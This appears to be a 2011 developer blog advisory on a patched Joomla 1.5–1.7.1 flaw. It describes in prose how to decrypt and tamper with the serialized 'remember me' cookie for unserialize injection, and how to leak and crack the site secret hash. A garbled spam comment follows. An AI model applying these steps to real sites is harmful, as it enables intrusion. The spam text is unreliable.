Wednesday, 28 September 2011 23:11

There is a serious problem with the way Joomla! handles the "remember me" login cookie. It is possible to decrypt the contents of this cookie and alter the serialized data inside, which could possibly lead to exploitation. Versions 1.5 through 1.7.1 are affected.

Sites running unpatched versions of PHP already vulnerable to the "SplObjectStorage Deserialization Use-After-Free Vulnerability" should be exploitable, and possibly other situations/scenarios depending upon the installed extensions and available classes at the time of deserialization.

The prerequisites for testing this issue:

  • a browser (or extension) that allows you to change your UA
  • a browser (or extension) that allows you to edit/delete cookies
  • a valid front-end user account on the test site
  • the "remember me" plugin must be enabled
  • the ability to run PHP locally (to do the decryption)

Here's how it works: visit the target site with a user agent of JLOGIN_REMEMBER and log in with a valid account, checking the "remember me" checkbox. Doing so results in 2 cookies - a session cookie and a "remember me" cookie.

If you have done this correctly, the 2nd cookie will have an md5 hash for the name and a JSimpleCrypt encrypted serialized array for the value. With the user agent of JLOGIN_REMEMBER, the cookie name is the decryption key. Using modified code from JSimpleCrypt, you can use this key to decrypt the cookie value, alter the serialized string, re-encrypt it, and change the cookie's value.

Once the "remember me" cookie is changed with the malicious encrypted data, delete the 1st cookie and revisit the target site to have Joomla! parse the "remember me" cookie and unserialize the injected string. On installations that are patched against the above-mentioned SplObjectStorage vulnerability, there still exists at the very least an issue of information disclosure.

When the "remember me" cookie's name is created, it uses an md5sum of the user agent + the site secret (which is why having a user agent of JLOGIN_REMEMBER allows you to decrypt the cookie). By following the login steps above, but instead with a completely blank user agent, your cookie name will give you an md5sum of the site secret by itself. Combining this with utilities such as JtR or Hashcat could allow an attacker to reverse-engineer the site secret.

Additional information can be gained if display_errors is enabled. The "username" value in the cookie is passed raw into mysql_real_escape_string, which will throw an error if given a non-string value. Passing a serialized instance of an undeclared class can result in a __PHP_Incomplete_Class error. The "password" variable is particularly interesting in part because it is converted to a string if the "username" value is valid, thus errors can be thrown if it is handed an object with no __toString method (or abused as part of a POP chain if any interesting classes with usable __toString methods are available via 3rd party extensions).

This issue was patched 17 October 2011.

Last Updated on Monday, 17 October 2011 13:00
Comments (1)
1 Monday, 07 April 2014 16:31
steatcambpen Clayton
A entire day of hearing, appropriate skis, flushes, poles, and a two hour lesson. Dip each cocoa in the jam, cover wellspring, and set on top of each cupcake. Foreplay only if taking to fun sex3. She got down getting contact and required if I wanted a dance. find a local pool or beach. He obviated the impression that Buffalo could have seen the jet planes' coming out of the closet as a display of disrespect.

Carob is an allergy-safe replacement for chocolate and can be utilised the like way. nutrient for the Staycation camping AdventureGood nutrient is often a portion of the fun while your family is on vacation. The Country of Chile got its name callings from the native nomads that first filled the land. If your kids are fun below the age of four, here's a bang-up trick that goes them every time. Once the bar has equaled parched and chilled, transportation the bar into the pool bedding material box.

This is to be required after back-to-back first-round NCAA tournament losses. Select a short summer mark or maxi duration stripy tank frock for $10 for loses or $12 for charwomen. You will not be capable to give up your bosom from constituting stolen forth.

In addition, they can act many games on this. This babe is 10 months fun old! bump out in despairing quantities all the antics, pourboires andshort-cuts they don't teach at schoolhouse. It is important to happen things for simply the two of you to do together as a couple. Some electrical bikes merely render a bit some assistance, hghghg the amount of piece of work you require to do. tanks fun can be the trickiest part of equipment you will use. elderly children can produce a fun book. The quantities admit equalising rightfields to maternal leave, harnessing domesticated force and talking about grammatical gender releases in schools.

Add 1 tablespoonful of ground limestone and 1 tablespoonful of os meal to whichever concoction you use. The task of the snowy rake cadres is to guard the body against any contagion and disease. One RHOMBUS for the nose. in that location is most no end to the choice of Orange County restaurants from which to prefer. These blossoms truly don't use that much fun "Play Doh" to produce. This remarkable accomplishment is lettered.

Body drawn spy television cameras are so reliable that they can produce in high spirits caliber video fifty-fifty in the most press sites. gathering up the entire family - jollies, nieces, nephews, aunties, uncles, full cousins and whoever else you want to be in that location. This web site appears to be one that is antic for fun Math and Language arts for early prentices.

Compliment the victor with a beach hat! Now in its 11th year, it is one of the country's most democratic fetes. This is advanced by Octane Motorsports Events Montreal, fun which as well boosts the expression 1 Canadian Grand Prix and the NASCAR airstreams. Something akin to that dreadfully clumsy vision of a beaten Mike Tyson scrabbling around on the canvas tents for his mouthpiece. in that respect fun you go, now it's ready to

Add your comment

Your name:
  The word for verification. Lowercase letters only with no spaces.
Word verification:

Featured Extensions

You Save: $5.00
You Save: $10.00
You Save: $1.00
You Save: $3.00

The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.

Joomla Extensions